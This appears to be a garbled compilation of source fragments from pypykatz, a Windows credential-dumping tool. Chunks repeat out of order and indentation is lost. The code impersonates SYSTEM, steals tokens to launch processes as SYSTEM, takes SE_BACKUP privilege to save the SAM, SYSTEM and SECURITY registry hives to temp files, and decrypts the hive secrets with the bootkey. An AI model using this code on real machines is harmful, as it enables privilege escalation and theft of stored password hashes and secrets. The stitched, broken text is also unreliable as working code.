# No explicit cmdline given: fall back to the shell named by the ComSpec environment variable (normally cmd.exe); os.environ[...] raises KeyError if it is unset.
cmdline = os.environ['ComSpec']
pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
return
elif args.module == 'token':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
if args.cmd == 'list':
pm = ProcessManipulator()
for ti in pm.list_all_tokens(args.force):
print(str(ti))
return
if args.cmd == 'current':
pm = ProcessManipulator()
token_info = pm.get_current_token_info()
print(str(token_info))
return
elif args.module == 'users':
from pypykatz.commons.winapi.machine import LiveMachine
if args.cmd == 'list':
lm = LiveMachine()
users = lm.list_users()
for sid in users:
print(str(users[sid]))
elif args.cmd == 'whoami':
lm = LiveMachine()
user = lm.get_current_user()
logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
raise
sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
locations = [
('SAM', sam_name),
('SYSTEM', system_name),
('SECURITY', security_name),
]
logger.debug('Obtaining SE_BACKUP privilege...')
try:
po = ProcessManipulator()
po.set_privilege(SE_BACKUP)
except Exception as e:
logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
raise e
logger.debug('Obtaining SE_BACKUP OK!')
dumped_names = {}
for reg_name, location in locations:
logger.debug('Dumping %s...' % reg_name)
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
winreg.SaveKey(key, location)
key.Close()
except Exception as e:
logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
else:
logging.basicConfig(level=level)
##### Common obj
results = {}
files_with_error = []
for helper in cmdhelpers:
helper.execute(args)
###### Live
if args.command == 'live':
if args.module == 'process':
if args.cmd == 'create':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
pm = ProcessManipulator()
sid = 'S-1-5-18'
if args.sid is not None:
sid = args.sid
if args.cmdline is not None:
cmdline = args.cmdline
else:
# No explicit cmdline given: fall back to the shell named by the ComSpec environment variable (normally cmd.exe); os.environ[...] raises KeyError if it is unset.
cmdline = os.environ['ComSpec']
pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
return
elif args.module == 'token':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
if args.cmd == 'list':
def get_secrets(self) -> None:
    """
    Parse the SAM/SECURITY hives of the running machine in place.

    On-the-fly parsing requires a SYSTEM token: this method impersonates
    SYSTEM on the calling thread via ProcessManipulator before touching
    any hive. If that fails the error is logged and re-raised, so an
    Administrator caller should instead dump the hives to disk and parse
    them offline.

    A third option exists -- take SE_TAKE_OWNERSHIP, open each hive with
    WRITE_OWNER and rewrite its owner/ACL to grant the administrator full
    access -- but it is deliberately not implemented here: it is intrusive,
    and a mistake in a hive's security descriptor can leave the machine
    unbootable (it is also a lot of work).

    Side effects: sets self.system, and self.sam / self.security when the
    corresponding *_hive attribute is truthy. Nothing in this method
    reverts the SYSTEM impersonation afterwards.

    Raises: whatever assign_token_thread_sid() raises when SYSTEM
    impersonation fails (re-raised after logging).
    """
    pm = ProcessManipulator()
    try:
        # Impersonate SYSTEM on this thread; the protected hives are only
        # readable with that token.
        pm.assign_token_thread_sid()
    except Exception as e:
        logger.error('Failed to obtain SYSTEM prvis. On-the-fly parsing is not possible.')
        raise e
    else:
        # Only reached when impersonation succeeded.
        self.system = SYSTEM(self.system_hive)
        # The bootkey derived from SYSTEM is handed to both SAM and SECURITY.
        bootkey = self.system.get_bootkey()
        if self.sam_hive:
            self.sam = SAM(self.sam_hive, bootkey)
            self.sam.get_secrets()
        if self.security_hive:
            self.security = SECURITY(self.security_hive, bootkey)
            # NOTE(review): this excerpt appears to end here; the original
            # may continue with self.security.get_secrets() (mirroring the
            # SAM branch) -- confirm against the full file.
"""
Creates a new process with the token of the target SID
TODO: implement non-interactive functionality :(
"""
for token in self.get_token_for_sid(target_sid = target_sid, dwDesiredAccess = TOKEN_ALL_ACCESS, ImpersonationLevel = SecurityImpersonation, TokenType = TokenImpersonation):
try:
self.api.advapi32.CreateProcessWithToken_manip(token, cmdline)
except Exception as e:
logger.log(1, 'Failed creating process with the token obtained. Reason: %s' % e)
continue
else:
logger.debug('[ProcessManipulator] Sucsessfully created process!')
break
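if __name__ == '__main__':
    # Manual smoke check of the ProcessManipulator API: print the access
    # token information of the current process. (Dead, commented-out
    # experiments that used to live here were removed.)
    pm = ProcessManipulator()
    ti = pm.get_current_token_info()
    print(str(ti))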
if args.sid is not None:
sid = args.sid
if args.cmdline is not None:
cmdline = args.cmdline
else:
# No explicit cmdline given: fall back to the shell named by the ComSpec environment variable (normally cmd.exe); os.environ[...] raises KeyError if it is unset.
cmdline = os.environ['ComSpec']
pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
return
elif args.module == 'token':
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
if args.cmd == 'list':
pm = ProcessManipulator()
for ti in pm.list_all_tokens(args.force):
print(str(ti))
return
if args.cmd == 'current':
pm = ProcessManipulator()
token_info = pm.get_current_token_info()
print(str(token_info))
return
elif args.module == 'users':
from pypykatz.commons.winapi.machine import LiveMachine
if args.cmd == 'list':
lm = LiveMachine()
users = lm.list_users()